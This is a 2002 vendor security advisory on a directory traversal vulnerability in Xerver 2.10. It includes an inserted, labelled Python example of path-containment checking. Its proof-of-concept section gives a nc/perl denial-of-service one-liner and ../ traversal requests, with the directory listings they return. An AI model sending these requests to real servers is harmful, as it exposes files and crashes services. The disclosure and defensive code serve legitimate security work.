© Neurowork™ 2010. All rights reserved.
Syb Security
is a business unit of Neurowork™

Advisories

SYBSEC-ADV03: Xerver Directory Traversal Vulnerability

Title: Xerver Directory Traversal Vulnerability
ID: SYBSEC-ADV03
Severity: MEDIUM - Directory Traversal Vulnerability
History:
01.MAR.2002 Vulnerability discovered
08.MAR.2002 Vendor contacted
Scope: Remote Directory Traversal Vulnerability
Platforms: Any
Author:
URL: http://www.sybsecurity.com/advisors/SYBSEC-ADV03-Xerver_Directory_Traversal_Vulnerability
Release: Public
Overview
Xerver is a freely available webserver, written in Java. It will run on any operating system with Java installed, including Microsoft Windows, Unix/Linux variants, MacOS, etc.
Affected versions
The vulnerability has been reported in Xerver Web Server 2.10.
Description
Dot-dot-slash (../) sequences are not filtered from web requests. It is possible for a remote attacker to craft a malicious web request which is capable of breaking out of wwwroot. This has the potential to disclose arbitrary web-readable files to remote attackers.
It should be noted that webservers on Microsoft Windows operating systems normally run with SYSTEM privileges, meaning the attacker may potentially disclose the contents of any file.
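The defence against the request pattern described above is to resolve the request path against the document root and refuse anything that ends up outside it. The following is an added example written for this advisory, not Xerver's own code; the document root /srv/wwwroot and the 8 KiB length cap are assumptions, and the logic is pure string handling so it runs without touching the filesystem.

```python
"""Map an HTTP request path onto a document root without letting it escape.
Added example for the advisory above; not part of Xerver."""
import posixpath
from urllib.parse import unquote

WWWROOT = "/srv/wwwroot"   # assumed document root for the demonstration
MAX_PATH_LEN = 8192        # assumed cap; rejects a 'C:/' x 500000 request line


def naive_map(request_path: str) -> str:
    """What a server that never filters '../' effectively does: it glues the
    request onto wwwroot and lets the OS resolve the '..' components."""
    return WWWROOT + request_path


def safe_map(request_path: str) -> tuple:
    """Return (allowed, filesystem_path_or_reason).

    Steps: cap length, percent-decode, reject NUL bytes, treat backslashes
    as separators, resolve '.'/'..' textually, then check containment."""
    if len(request_path) > MAX_PATH_LEN:
        return False, "rejected: request path too long"
    decoded = unquote(request_path)            # %2e%2e -> .., %00 -> NUL
    if "\x00" in decoded:
        return False, "rejected: NUL byte in path"
    decoded = decoded.replace("\\", "/")       # Windows accepts both separators
    joined = posixpath.join(WWWROOT, decoded.lstrip("/"))
    resolved = posixpath.normpath(joined)      # collapses '..' segments
    # normpath happily climbs above WWWROOT, so the containment test is what
    # actually stops traversal: the result must be the root or inside it.
    if resolved != WWWROOT and not resolved.startswith(WWWROOT + "/"):
        return False, f"rejected: {resolved!r} is outside {WWWROOT}"
    return True, resolved


if __name__ == "__main__":
    # Constructed sample requests, including the shapes quoted in this advisory
    for req in ["/index.html",
                "/unix/ALEX/Xerver2.10/../../../",
                "/../../../WINNT/system32/",
                "/%2e%2e/%2e%2e/%2e%2e/WINNT/system32/",
                "/index.html%00.jsp",
                "/" + "C:/" * 500000]:
        allowed, detail = safe_map(req)
        print(f"{req[:48]:<50} -> {'ALLOW' if allowed else 'DENY '} {detail[:60]}")
```

Note that the check is applied to the decoded form, so encoded and literal `../` are treated alike; a request that resolves exactly to the root is allowed, which is why the advisory's first example path is accepted but the `WINNT/system32/` variants are not.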
Workaround
Upgrade to the current software version, which can be downloaded from:
http://www.javascript.nu/xerver
Acknowledgments
This vulnerability has been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
A remote attacker can send a specially-crafted request containing a null character (%00) followed by malicious code that would be executed in the victim's Web browser within the security context of the hosting site.

A remote attacker can connect to port 32123 and send multiple requests containing 'C:/' to cause the Web server to crash.

------oOo------
Proof of concept

Denial of Service (DoS)

http://localhost:32123

$ printf "GET /`perl -e 'print "C:/"x500000'` " |nc -vvn 127.0.0.1 32123

Exploitation:

Example 1:

Via web:

http://localhost/unix/ALEX/Xerver2.10/../../../

Directory Listing for /

File name File size Last modified


ALEX
Documents and Settings
My Downloads
Program Files
RECYCLER

[/snip]

Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The result is:

Directory Listing for /WINNT/system32/

File name File size Last modified
../
AdCache
CatRoot
Com
DTCLog
DirectX
GroupPolicy
Hummbird
IOSUBSYS
Macromed
Microsoft

[/snip]
------oOo------